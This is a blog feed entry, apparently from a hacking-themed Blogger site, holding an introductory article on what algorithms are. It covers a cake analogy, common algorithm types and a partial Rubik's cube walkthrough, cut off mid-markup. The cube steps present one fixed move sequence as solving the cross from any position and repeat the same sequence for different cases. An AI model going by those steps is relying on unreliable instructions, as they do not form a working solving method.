tag:blogger.com,1999:blog-71713792812819501242024-03-06T19:34:23.407-08:00HACKERSLearn Hacking And Get Hacking toolsUnknownnoreply@blogger.comBlogger590125tag:blogger.com,1999:blog-7171379281281950124.post-80176198515661726612020-07-29T16:22:00.004-07:002020-07-29T16:27:57.122-07:00What Are Algorithms & Why Are They Important<p dir="ltr" id="docs-internal-guid-df5783fc-7fff-9e7d-c118-de6e7719d43a" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">What Are Algorithms & Why Are They Important</span></p><br /><h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">What Is An Algorithm?</span></h2><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">An algorithm is a set of step-by-step procedures, or a set of rules to follow, for completing a specific</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> task or solving a particular problem. Algorithms are all around us. The recipe for baking a cake, <br /></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">the method we use to solve a long division problem, and the process of doing laundry are all examples</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">of an algorithm. Here’s what baking a cake might look like, written out as a list of instructions, just like <br /></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">an algorithm:</span></p><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Preheat the oven</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Gather the ingredients</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Measure out the ingredients</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Mix together the ingredients to make the batter</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Grease a pan</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Pour the batter into the pan</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Put the pan in the oven</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Set a timer</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">When the timer goes off, take the pan out of the oven</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Enjoy!</span></p></li></ol><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Algorithmic programming is all about writing a set of rules that instruct the computer how to perform</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> a task. A computer program is essentially an algorithm that tells the computer what specific steps</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> to execute, in what specific order, in order to carry out a specific task. Algorithms are written using particular syntax, depending on the programming language being used.</span></p><h2 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 18pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Types of Algorithms</span></h2><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Algorithms are classified based on the concepts that they use to accomplish a task. While there</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> are many types of algorithms, the most fundamental types of computer science algorithms are:</span></p><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Divide and conquer algorithms – divide the problem into smaller subproblems of the same <br />type; solve those smaller problems, and combine those solutions to solve the original problem.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Brute force algorithms – try all possible solutions until a satisfactory solution is found.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Randomized algorithms – use a random number at least once during the computation <br />to find a solution to the problem.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Greedy algorithms – find an optimal solution at the local level with the intent of finding <br />an optimal solution for the whole problem.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Recursive algorithms – solve the lowest and simplest version of a problem to then<br /> solve increasingly larger versions of the problem until the solution to the original <br />problem is found.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Backtracking algorithms – divide the problem into subproblems, each which can be<br /> attempted to be solved; however, if the desired solution is not reached, move backwards <br />in the problem until a path is found that moves it forward.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Dynamic programming algorithms – break a complex problem into a collection of simpler <br />subproblems, then solve each of those subproblems only once, storing their solution for <br />future use instead of re-computing their solutions.</span></p></li></ol><h3 dir="ltr" style="line-height: 1.2; margin-bottom: 4pt; margin-top: 14pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Example of an Algorithm</span></h3><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><a href="https://rubiks-cube-solver.com/how-to-solve/" style="text-decoration: none;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Solving a Rubik’s Cube</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">There are a number of different algorithms, from simple to very complicated, that exist for <br />solving a Rubik’s cube. Below is just one simple algorithm. First, let’s specify a notation to <br />use (similar to picking a programming language).</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Each of the six faces of a Rubik’s cube can be represented by the first letter of their name:</span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">U - up</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">D - down</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">L - left</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">R - right</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">F - front</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">B - back</span></p></li></ul><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Each face can be turned in three different ways/directions. Using U as an example, these are<br /> represented as:</span></p><ul style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">U - clockwise quarter-turn of the upper face</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">U' - counter-clockwise quarter-turn of the upper face</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">U2 - half turn in either direction of the upper face</span></p></li></ul><p dir="ltr" style="line-height: 1.2; margin-bottom: 13pt; margin-top: 13pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Now, let’s go through the steps in the algorithm to solve a Rubik’s Cube. Feel free to grab one<br /> of your own and follow along!</span></p><h4 dir="ltr" style="line-height: 1.2; margin-bottom: 2pt; margin-top: 12pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Step 1: The Cross</span></h4><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">First, flip some edges so that there is a white cross on the upper face.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Apply the following turns: F, R’, D’, R, F2, R’, U, R, U’, R’, R2, L2, U2, R2, L2.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The cross is now solved.</span></p></li></ol><h4 dir="ltr" style="line-height: 1.2; margin-bottom: 2pt; margin-top: 12pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Step 2: The White Corners</span></h4><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The edges on the white face are now complete, but the corners remain.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Depending on where the white-orange-green corner is in the puzzle, apply one of the<br /> following series of turns:</span></p></li><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Bottom: R’, D’, R, D (repeat until the corner moves to its correct place)</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Top: R’, D’, R, D (this moves the corner to the bottom; then, follow the above instructions)</span></p></li></ol></ol><h4 dir="ltr" style="line-height: 1.2; margin-bottom: 2pt; margin-top: 12pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Step 3: Middle Layer Edges</span></h4><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 20pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Flip the cube so that the white is on the bottom.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Look for an edge that is on the top face and doesn’t have yellow on it.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Perform a U-turn so that the color on the front face of the edge matches with the center.</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Depending on the direction that the edge could go, apply one of the following series of turns:</span></p></li><ol style="margin-bottom: 0px; margin-top: 0px;"><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 0pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Left: U’, L’, U, L, U, F, U’, F’</span></p></li><li dir="ltr" style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; margin-left: 8pt; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.2; margin-bottom: 20pt; margin-right: 8pt; margin-top: 0pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Right: U, R, U’, R’, U’, F’, U, F)</span></p></li></ol></ol><h4 dir="ltr" style="line-height: 1.2; margin-bottom: 2pt; margin-top: 12pt;"><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; 